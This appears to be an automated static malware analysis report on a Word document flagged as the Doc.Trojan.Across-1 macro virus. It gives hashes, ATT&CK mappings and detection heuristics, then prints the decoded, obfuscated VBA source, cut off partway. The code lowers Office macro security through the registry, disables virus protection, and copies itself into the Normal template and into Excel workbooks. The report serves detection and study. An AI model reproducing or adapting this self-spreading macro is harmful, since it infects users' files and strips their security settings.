Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21c2a0b5f6570004…

MALICIOUS

Office (OLE)

43.5 KB Created: 2000-08-18 20:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 21f47ed35730379a40577271c990f4e8 SHA-1: 74255330221329a0ac0139c5a1d244012dbc1e7d SHA-256: 21c2a0b5f65700047093e1d54a9e69199fbb16231126e4e161c99a05f6d3d993
280 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that attempt to disable security settings and inject code into the Normal template, likely for persistence. The script also attempts to modify registry keys related to Office security. The ClamAV detection 'Doc.Trojan.Across-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Across-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Across-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27389 bytes
SHA-256: 1d9f1aef9377d9e3752be7a7c31bb63929266a267a2a3ed51d4e238e17a38499
Detection
ClamAV: Doc.Trojan.Across-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Cross.Angel
Private Sub Document_Close()
On Error Resume Next
Const ž»§–Ê = "' Cross.Angel", …·µ¶Š = 130, ‡š…©® = "9.0", ª’¼¹® = "Macro", »–Šš¦ = "Tools", µžŠª¯ = &H1, µžŠª¯_ = &H0, ¸‡Â”“ = 0, ª¾±³· = 1, „©¶° = 12, ·˜¯¨¦ = "excel.application", ȇ‰ƒ· = "DieseArbeitsmappe"
If Application.Version = ‡š…©® Then
    Application.CommandBars(ª’¼¹®).Controls((ª¾±³· + ª¾±³· + ª¾±³·)).Enabled = (Rnd * ¸‡Â”“)
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = µžŠª¯
Else
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = µžŠª¯_
    Application.CommandBars(»–Šš¦).Controls(„©¶°).Enabled = (Rnd * ¸‡Â”“)
    Options.VirusProtection = (Rnd * ¸‡Â”“)
End If
Options.SaveNormalPrompt = (Rnd * ¸‡Â”“)
ȹŽ±¦ = ½‘ˆ²†(ThisDocument.VBProject.VBComponents(ª¾±³·).CodeModule.Lines(ª¾±³·, …·µ¶Š))
If MacroContainer = ActiveDocument Then Set ÈŽ‡Œ” = NormalTemplate Else Set ÈŽ‡Œ” = ActiveDocument
With ÈŽ‡Œ”.VBProject.VBComponents(ª¾±³·).CodeModule
    If .Lines(ª¾±³·, ª¾±³·) <> ž»§–Ê Then
        .DeleteLines ª¾±³·, .CountOfLines
        .InsertLines ª¾±³·, ȹŽ±¦
        If ÈŽ‡Œ” = ActiveDocument Then ActiveDocument.SaveAs ActiveDocument.FullName
    End If
End With
If System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") <> ª¾±³· Then
Set ÈÅ”›² = GetObject(, ·˜¯¨¦)
If ÈÅ”›² = "" Then Set ÈÅ”›² = CreateObject(·˜¯¨¦): ˆŽ£È« = ª¾±³·
If ˆŽ£È« <> ª¾±³· Then
    For Each À˜Êƒˆ In ÈÅ”›².Workbooks
       With À˜Êƒˆ.VBProject.VBComponents(ȇ‰ƒ·).CodeModule
            If .Lines(ª¾±³·, ª¾±³·) <> ž»§–Ê Then
                .DeleteLines ª¾±³·, .CountOfLines
                .InsertLines ª¾±³·, ȹŽ±¦
                If À˜Êƒˆ.Path <> "" Then À˜Êƒˆ.Save Else À˜Êƒˆ.SaveAs À˜Êƒˆ.FullName
            End If
        End With
    Next
Else
    For À˜Êƒˆ = ª¾±³· To ÈÅ”›².Application.RecentFiles.Maximum
        ÈÅ”›².Application.RecentFiles(À˜Êƒˆ).Open
            With ÈÅ”›².Application.Workbooks(Application.RecentFiles(1).Name).VBProject.VBComponents(ȇ‰ƒ·).CodeModule
                If .Lines(ª¾±³·, ª¾±³·) <> ž»§–Ê Then
                    .DeleteLines ª¾±³·, .CountOfLines
                    .InsertLines ª¾±³·, ȹŽ±¦
                End If
            End With
        ÈÅ”›².Application.Workbooks(Application.RecentFiles(1).Name).Close ª¾±³·
    Next
    ÈÅ”›².Quit
End If
System.PrivateProfileString("c:\.ini", "Carinthia", "Excel") = ª¾±³·
End If
If Minute(Now()) = Int(Rnd * 60) + 1 Then MsgBox "Why I lost my angel? Can't live without you!", vbQuestion, "Cross.Angel by jackie-/Lz0NT/MVT"
If System.PrivateProfileString("c:\.ini", "Carinthia", "Word") <> ª¾±³· Then System.PrivateProfileString("c:\.ini", "Carinthia", "Word") = ª¾±³·
End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Const ž»§–Ê = "' Cross.Angel", …·µ¶Š = 130, ‡š…©® = "9.0", ª’¼¹® = "Macro", »–Šš¦ = "Tools", ¸‡Â”“ = 0, ª¾±³· = 1, „©¶° = 10, ·˜¯¨¦ = "word.application", ȇ‰ƒ· = "DieseArbeitsmappe"
If UCase(Dir("c:\.reg")) <> ".REG" Then
Open "c:\.reg" For Output As #1
    Print #1, "REGEDIT4"
If Application.Version = ‡š…©® Then
    Application.CommandBars(ª’¼¹®).Controls((ª¾±³· + ª¾±³· + ª¾±³·)).Enabled = (Rnd * ¸‡Â”“)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
    Print #1, """Level""=dword:00000001"
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
    Print #1, """Level""=dword:00000001"
Else
    Application.CommandBars(»–Šš¦).Controls(„©¶°).Enabled = (Rnd * ¸‡Â”“)
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
    Print #1, """Options6""=dword:00000000"
    Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Wor
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.